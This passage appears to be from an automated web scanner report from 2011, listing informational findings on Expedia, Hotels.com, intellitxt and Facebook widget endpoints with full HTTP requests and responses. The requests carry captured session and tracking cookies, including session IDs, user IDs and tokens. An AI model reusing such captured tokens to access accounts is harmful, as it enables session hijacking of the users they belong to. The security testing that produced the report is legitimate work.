Set-Cookie: hl_upm=Y4E7n03ene2ZDIPTWpLM1HtSrQx1OyDdsY4KBK1Ss8UP/OJVjMn5RXwMzdzUolZoFNbG0LY/3mcQGEZsuUEqCnQbfgjRj4VsjvumK61KYW6STNlZyeUAoRVCwQV95GelrZYv9T+F4ihtxKQX2KvJ7B5A5irb80cRm/ytUchfcD4751Ifq1MCuSv/SbW9T5SKs60TyNFRhvi7r3qCLm0xePAkzqTyjWkO9smcGQ45jVLKNXKPyLBr0ZmBx9IhDTuGrSvRTLDRtrL7iZCRnyyGZcmGrHvDoTT+I+B0mUa+sljI8aJcgg/Qm62+DhGTQPwBV6MYexkhjO8=; expires=Thu, 02-Oct-2014 00:28:52 GMT; path=/
X-Powered-By: ASP.NET
p3p: CP="ALL DSP COR CUR ADMo DEVo PSAo PSDo IVDi OUR STP PRE"
Date: Mon, 03 Oct 2011 00:28:51 GMT
Connection: close

var THSearch = 3028518073;var thSiteId = 9;
var radioButtonInitialized=false;var th_domain="delivery.hotels.com";var th_protocol=(document.location.toString().indexOf("https")!=-1)?"https":"http";var th_imgPlus=th_protocol+"://media.expedia.com/ads/extras/media/images/HCOM/plus_icon.png";var th_imgMinus=th_protocol+"://media.expedia.com/ads/extras/media/images/HCOM/minus_icon.png";var th_errs=0;var thPage,thOValue;jQuery.cookie=function(name,value,options){if(typeof value!="undefined"){options=options||{};if(value===null){value="";options.expires=-1}var expires="";if(options.expires&&(typeof options.expires=="number"||options.expires.toUTCString)){var date;if(typeof options.expires=="number"){date=new Date();date.setTime(date.getTime()+(options.expires*24*60*60*1000))}else{date=options.expires}expires="; expires="+date.toUTCString()}var path=options.path?"; path="+(options.path):"";var domain=options.domain?"; domain="+(options.domain):"";var secure=options.secure?"; secure":"";document.cookie=[name,"=",encodeURIComponent(value),expires,path,domain,secure].join("")}else{var cookieValue=null;if(document.cookie&&document.cookie!=""){var cookies=document.cookie.split(";");for(var i=0;i<cookies.length;i++){var cookie=jQuery.trim(cookies[i]);if(cookie.substring(0,name.length+1)==(name+"=")){cookieValue=decodeURIComponent(cookie.substring(name.length+1));bre
...[SNIP]...

Request 2

GET /Hotels/Delivery.aspx?LAN=en_US&P=PROPERTY_DESCRIPTION&D=BOS&CI=10%2f04%2f2011&CO=10%2f07%2f2011&pr=1&pa0=2&RID=A2AFB563-0907-4A03-86F0-03006AED6E0E&H=279478&HP=289.0 HTTP/1.1
Host: delivery.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; UID=1961757583|1|0; hl_upm=Y4E7n03ene2ZDIPTWpLM1HtSrQx1OyDdsY4KBK1Ss8UP/OJVjMn5RXwMzdzUolZoFNbG0LY/3md8l5aT/KgDPt+3IVCZ0+X/OJlVTBCzzIJq6mbaXw5f2OTC9SJuffV9JxhkotBEViCI9C/lLFfEkan9sqnGJkiNO063snxtu5wSxTUNe8/bIJVcqrlCAl0XA9V5PzeRLbpFrDHWUr91KWkqiLKfvmiC1YyVop9id6jRgWqmJcXrStYZxh1Ko0KZmHsu1OyGvCuBJj15A4max6Cfmtx38OoK; hl_ubm=YDnUkiZb5XknMSm4p9+V5cZHCQxkEJ6V6VqmAnOws74lcpUw6ATilWACOa7+CMV6BPk9KWTKRZCo+bSXw6V1OBTkPGiowZ+0FoEtWiQ+BQ8=; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
p3p: CP="ALL DSP COR CUR ADMo DEVo PSAo PSDo IVDi OUR STP PRE"
Date: Mon, 03 Oct 2011 00:29:14 GMT
Connection: close


17.3. http://extras.expedia.com/Hotels/Delivery/ISDirect.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://extras.expedia.com
Path:   /Hotels/Delivery/ISDirect.aspx

Request 1

GET /Hotels/Delivery/ISDirect.aspx?thrn=635569865&Path=HOT&HN=Hotel%20Commonwealth&HID=894999&SV=40&pr=1&CI=20111014&CO=20111016&pa=2&pc=0&ca=&RN=Kenmore%20Room|Fenway%20Room|Commonwealth%20Room&AP=||&P=||&drid=660&vers=en_US&sid=1&tpid=1&eapid=21187 HTTP/1.1
Host: extras.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Boston-Hotels-Hotel-Commonwealth.h894999.Hotel-Information?icmcid=TRIPA.Expedia_US-H_B4.11893.T&icmdtl=MT1110027Z3xeMPeET6itK0Qu1f-JQAAU.894999.HDSSDeE.T.QCI.258705.ch.668.60745.en_US..&chkin=10/14/11&hashTag=roomsAndRates&chkout=10/16/11&eapid=21187-1&rm1=a2&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; U9Z5=0; UID=1961758836|0|0; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; bn_u=7520316067152911274; COOKIECHECK=1; lsrc=v.1,10/16/2011; MediaCookie=0`1034,1004,PDEST,BOS; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; expEAPID=00; hl_upm=Y4E7n03ene2ZDIPTWpLM1HtSrQx1OyDd5GFAnVqxZzRrIR6V8ksXrB+9RBTwy9+8cmuXkhnPx+GZsSugzPj44bU6i3lytIIs1AmibCRbQsFxIV6Rm6hVtS8XFB5+Ybtt7LlL2ngKo/3MZXMZeAv1agsoGnLEijiy1UGml8x4MalGwB7gMZ8YKmw4rdHPE8fjrABaqXy92N/rAUZv0Bp56Z43Np/g/+Q83s3WVMhP7tSrZHUPcwvqSFfJu+ADJZw+cpAMQevWwCSPFyAaK32md2Q1sM1k6ehVJgTG6c0M0umpnQLXIpde/cX9fDeTw+MVNStyGLsBv8T2IygNQD8KljABoP+lIG66oNCE0yIgA6c18WfGFGaBrsUsH80bmmnEoUWSaTQ38ft1eupTul/AnYkAPiqr+ZV7GVoAvUMBeP9d3AcfYYYeetW2spKzsTF2; hl_ubm=YDnUkiZb5XknMSm4p9+V5T8RmRF0mVMvy3+V1f5ajj9dflZl2WuSXyvJahmCZ6mo/NwB5qXcNob793uClge54w==; iEAPID=21187; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; JSESSION=1cf0d0d6-5e6f-4aff-9a37-f908a92430be; s1=`EAPName=TripAdvisor`EAPBrandingFeature=0`EAPIsVisible=0`EAPIndustry=Other`MH=21187`EAPBrandingURL=`99; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/x-javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: UID=1961758836|0|0; expires=Tue, 02-Oct-2012 01:02:49 GMT; path=/
Set-Cookie: hl_upm=Y4E7n03ene2ZDIPTWpLM1HtSrQx1OyDd5GFAnVqxZzRrIR6V8ksXrB+9RBTwy9+8cmuXkhnPx+HLJmxmUhG2DfAd521oLsclktNfAOvcaPV6oi2IfHJjqul4zzjU9LXQkjNf2WvqfZqdXCa3A29SsKe+ybsW1+KB9q3k8/HsB5zRSsUSE1LTZIA3+VxUeBbOVTgZoaWvu0C1RPzxnm4c69yDmjOTUgUbkPe5bK9TQIM5+/rqSOlt6M9Kacg/4gaZL3WgUhe+L3wPJYWqiktHslK4Ql6n2LILMfXFTpTOS6gB6/NLli1taXF1q1bB2lZvFZlcSmfBf5JPdtgQhrhvAnroVp7PP6DFdMVjqf1Q8nhbFmORqCOaM4C1/nBuXOkexOjyUzCM4fLgqY3P94oq1AGny1QrPt1Ei9KiUIC/J+yleDb3wJU7NRftazmHPcqwaSkNUdqEgdEKQxWbd+aByw==; expires=Thu, 02-Oct-2014 01:02:49 GMT; path=/
X-Powered-By: ASP.NET
p3p: CP="ALL DSP COR CUR ADMo DEVo PSAo PSDo IVDi OUR STP PRE"
Date: Mon, 03 Oct 2011 01:02:48 GMT
Connection: close

var THSearch = 3028587642;var thSiteId = 1;
if(typeof th_domain=="undefined"){th_domain="extras.expedia.com"}var thProt=(window.location.protocol=="http:")?"http":"https";var thCoTxt={code:"UK",inlineOpen:"Show details",inlineClose:"Hide details",popupOpen:"see details",popupClose:"Close",popupHeadline:"",CallCost:"Call cost",bdOpen:"Show Extras Details",bdClose:"Hide Extras Details",bdTotal:"total",bdFree:"FREE",terms:"Terms & Conditions",policy:"Privacy Policy",bookFlightPlusHotel:"Book flight + hotel",termsLink:"//www.expedia.co.uk/daily/service/thterms.asp?IID=",policyLink:"//www.expedia.co.uk/daily/service/privacy.asp",compHeader:"Complimentary items, courtesy of Expedia",compFree:'This booking includes <span style="color:#cc6600; font-weight:bold;">FREE Expedia Extras</span>',getYour:"View Details",viewReceive:"Request Shipment",printCoupon:"Print Your Voucher",viewRedeem:"View instructions to redeem",itinClaim:"This booking includes FREE Expedia Extras",topOfPage:"back to top",included:"Included",showAll:"Show all",extrasIncluded:"more Extras Included."};var thErrorC=0;var thPopupC=typeof(thPopupC)!="undefined"?thPopupC:0;var th1pgOverrideStyle=(document.getElementById("pageId")&&document.getElementById("pag
...[SNIP]...

Request 2

GET /Hotels/Delivery/ISDirect.aspx?thrn=635569865&Path=HOT&HN=Hotel%20Commonwealth&HID=894999&SV=40&pr=1&CI=20111014&CO=20111016&pa=2&pc=0&ca=&RN=Kenmore%20Room|Fenway%20Room|Commonwealth%20Room&AP=||&P=||&drid=660&vers=en_US&sid=1&tpid=1&eapid=21187 HTTP/1.1
Host: extras.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; U9Z5=0; UID=1961758836|0|0; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; bn_u=7520316067152911274; COOKIECHECK=1; lsrc=v.1,10/16/2011; MediaCookie=0`1034,1004,PDEST,BOS; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; expEAPID=00; hl_upm=Y4E7n03ene2ZDIPTWpLM1HtSrQx1OyDd5GFAnVqxZzRrIR6V8ksXrB+9RBTwy9+8cmuXkhnPx+GZsSugzPj44bU6i3lytIIs1AmibCRbQsFxIV6Rm6hVtS8XFB5+Ybtt7LlL2ngKo/3MZXMZeAv1agsoGnLEijiy1UGml8x4MalGwB7gMZ8YKmw4rdHPE8fjrABaqXy92N/rAUZv0Bp56Z43Np/g/+Q83s3WVMhP7tSrZHUPcwvqSFfJu+ADJZw+cpAMQevWwCSPFyAaK32md2Q1sM1k6ehVJgTG6c0M0umpnQLXIpde/cX9fDeTw+MVNStyGLsBv8T2IygNQD8KljABoP+lIG66oNCE0yIgA6c18WfGFGaBrsUsH80bmmnEoUWSaTQ38ft1eupTul/AnYkAPiqr+ZV7GVoAvUMBeP9d3AcfYYYeetW2spKzsTF2; hl_ubm=YDnUkiZb5XknMSm4p9+V5T8RmRF0mVMvy3+V1f5ajj9dflZl2WuSXyvJahmCZ6mo/NwB5qXcNob793uClge54w==; iEAPID=21187; aspp=v.1,0|TRIPA.Expedia_US-H_B4.11893.T|||||||||ICM|20111101|; JSESSION=1cf0d0d6-5e6f-4aff-9a37-f908a92430be; s1=`EAPName=TripAdvisor`EAPBrandingFeature=0`EAPIsVisible=0`EAPIndustry=Other`MH=21187`EAPBrandingURL=`99; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
p3p: CP="ALL DSP COR CUR ADMo DEVo PSAo PSDo IVDi OUR STP PRE"
Date: Mon, 03 Oct 2011 01:06:23 GMT
Connection: close


17.4. http://goal.us.intellitxt.com/intellitxt/front.asp

Summary

Severity:   Information
Confidence:   Firm
Host:   http://goal.us.intellitxt.com
Path:   /intellitxt/front.asp

Request 1

GET /intellitxt/front.asp?ipid=17560 HTTP/1.1
Host: goal.us.intellitxt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ITXTCtxtHistOff=1

Response 1

HTTP/1.1 200 OK
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=""; Domain=.intellitxt.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript;charset=iso-8859-1
Vary: Accept-Encoding
Content-Length: 11435
Date: Mon, 03 Oct 2011 00:00:30 GMT
Age: 0
Connection: keep-alive

document.itxtDebugOn=0;if('undefined'==typeof $iTXT){$iTXT={};};$iTXT.debug={Log:function()
{},Category:{},error:function()
{},info:function()
{},debug:function()
{},trace:function()
{},Util:{isLoggingOn:function()
{return false;},hilite:function()
{}}}
itxtFeedback=function()
{};
if('undefined'==typeof $iTXT){$iTXT={};};document.itxtDisabled=1;
if(document.itxtDisabled)
{document.itxtInProg=1;
if(!$iTXT.cnst){$iTXT.cnst={};}
if(!$iTXT.debug){$iTXT.debug={};}
if(!$iTXT.glob){$iTXT.glob={track:{}};}
if(!$iTXT.js){$iTXT.js={};}
if(!$iTXT.tmpl){$iTXT.tmpl={};}
if(!$iTXT.tmpl.js){$iTXT.tmpl.js={};}
if(!$iTXT.tmpl.components){$iTXT.tmpl.components={};}
if(!$iTXT.core){$iTXT.core={};};

if(!$iTXT.data){$iTXT.data={};};

if(!$iTXT.debug){$iTXT.debug={};};


if(!$iTXT.fx){$iTXT.fx={};};

if(!$iTXT.itxt){$iTXT.itxt={};};

if(!$iTXT.metrics){$iTXT.metrics={};};


if(!$iTXT.tmpl){$iTXT.tmpl={};};

if(!$iTXT.ui){$iTXT.ui={};};


document.itxtIsReady=0;
$iTXT.js.loaderCallbacks=[];$iTXT.js.exclCont=function()
{try
{var d=document.getElementById('itxtexclude');if(null==d)
{var b=document.getElementsByTagName('body')[0];d=document.createElement('div');d.id='itxtexclude';b.insertBefore(d,b.firstChild);}
return d;}catch(x){};};$iTXT.js.load=function(src)
{if('string'!=typeof src||(!src.match(/^http/)&&!src.match(/^file/)))
{return;};try
{var e=document.createElement('script');e.src=src;e.type='text/javascript';var d=$iTXT.js.exclCont();d.insertBefore(e,d.firstChild);}catch(x){};};$iTXT.js.loadCss=function(src,id){try
{var ss=document.createElement('link');ss.id=id;ss.href=src;ss.type='text/css';ss.rel='stylesheet';var d=$iTXT.js.exclCont();d.insertBefore(ss,d.firstChild);}catch(x){}};if(!$iTXT.js.loader){$iTXT.js.loader={};}
$iTXT.js.libPath='http://images.intellitxt.com/ast/js/vm/jslib/';$iTXT.js.loadLib=function(libName,className)
{var lib='$iTXT.'+libName+'.'+className;var path=$iTXT.js.libPath+libName+'/'+className.toLowerCase()+'.js';if('undefined'==typeof($iTXT.js.loader[lib]))
{$iTXT.js.loader[lib]=false;};};$iTXT.js.check=function()
{if(!document.itxtIsReady)
{return window.setTimeout($iTXT.js.check,100);}
var error=0;for(var libName in $iTXT.js.loader)
{if(!$iTXT.js.loader[libName])
{error=1;break;};}
if(error)
{window.setTimeout($iTXT.js.check,100);
...[SNIP]...

Request 2

GET /intellitxt/front.asp?ipid=17560 HTTP/1.1
Host: goal.us.intellitxt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ITXTCtxtHistOff=1

Response 2

HTTP/1.1 200 OK
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=""; Domain=.intellitxt.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript;charset=iso-8859-1
Content-Length: 282
Date: Mon, 03 Oct 2011 00:00:41 GMT
Age: 0
Connection: keep-alive

document.itxtDebugOn=0;if('undefined'==typeof $iTXT){$iTXT={};};$iTXT.debug={Log:function()
{},Category:{},error:function()
{},info:function()
{},debug:function()
{},trace:function()
{},Util:{isLoggingOn:function()
{return false;},hilite:function()
{}}}
itxtFeedback=function()
{};

17.5. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/like.php

Request 1

GET /plugins/like.php?app_id=178412055558267&href=http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live&send=false&layout=button_count&width=140&show_faces=false&action=recommend&colorscheme=light&font=arial&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.186.23
X-Cnection: close
Date: Sun, 02 Oct 2011 23:57:56 GMT
Content-Length: 23424

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
<div id="connect_widget_4e88fa84a611b9a98058613" class="connect_widget button_count" style="font-family: &quot;arial&quot;, sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider"><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Recommend</span></a></div></div></td><td class="connect_widget_vertical_center connect_widget_confirm_cell"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_button_count_including hidden_elem"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="thumbs_up hidden_elem"></div></td><td><div class="undo hidden_elem"></div></td></tr><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">61</div></td></tr></tbody></table></td><td class="connect_widget_button_count_excluding"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">60</div></td></tr></tbody></table></td></tr></table></div></div><script type="text/javascript">
Env={module:"like_widget",impid:"22d17c7d",fb_dtsg:"AQAoZjOu",no_cookies:1,lhsh:"GAQABQhzp"};
</script>
<script>



onloadRegister(function (){Bootloader.done([])});
onloadRegister(function (){defer_until(function() { new ExternalPageLikeWidget({"viewer":0,"channelURL":"","mobile":false,"nodeType":"link","externalURL":"http:\/\/www.guardian.co.uk\/football\/2011\/sep\/27\/manchester-united-basel-live","pageId":null,"widgetID":"connect_widget_4e88fa84a611b9a98058613","alreadyConnected":false,"viewerIsAdmin":false,"adminUrl":"","showFaces":false,"useUnlikeLink":false,"layout":"button_count","locale":"en_US","com
...[SNIP]...

Request 2

GET /plugins/like.php?app_id=178412055558267&href=http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live&send=false&layout=button_count&width=140&show_faces=false&action=recommend&colorscheme=light&font=arial&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.142.42
X-Cnection: close
Date: Sun, 02 Oct 2011 23:58:03 GMT
Content-Length: 23344

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
<div id="connect_widget_4e88fa8bdae129395189817" class="connect_widget button_count" style="font-family: &quot;arial&quot;, sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider"><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Recommend</span></a></div></div></td><td class="connect_widget_vertical_center connect_widget_confirm_cell"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_button_count_including hidden_elem"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="thumbs_up hidden_elem"></div></td><td><div class="undo hidden_elem"></div></td></tr><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">61</div></td></tr></tbody></table></td><td class="connect_widget_button_count_excluding"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">60</div></td></tr></tbody></table></td></tr></table></div></div><script type="text/javascript">
Env={module:"like_widget",impid:"57cc2e8c",fb_dtsg:"AQAoZjOu",no_cookies:1,lhsh:"zAQAeS3-n"};
</script>
<script>



onloadRegister(function (){Bootloader.done([])});
onloadRegister(function (){defer_until(function() { new ExternalPageLikeWidget({"viewer":0,"channelURL":"","mobile":false,"nodeType":"link","externalURL":"http:\/\/www.guardian.co.uk\/football\/2011\/sep\/27\/manchester-united-basel-live","pageId":null,"widgetID":"connect_widget_4e88fa8bdae129395189817","alreadyConnected":false,"viewerIsAdmin":false,"adminUrl":"","showFaces":false,"useUnlikeLink":false,"layout":"button_count","locale":"en_US","com
...[SNIP]...

17.6. http://www.hotels.com/html/blank.html

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.hotels.com
Path:   /html/blank.html

Request 1

GET /html/blank.html HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_sv_sid=1011730152590; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; SSRT=oQGJTgA; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; s_cc=true; s_sq=%5B%5BB%5D%5D; SSLB=1; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA; 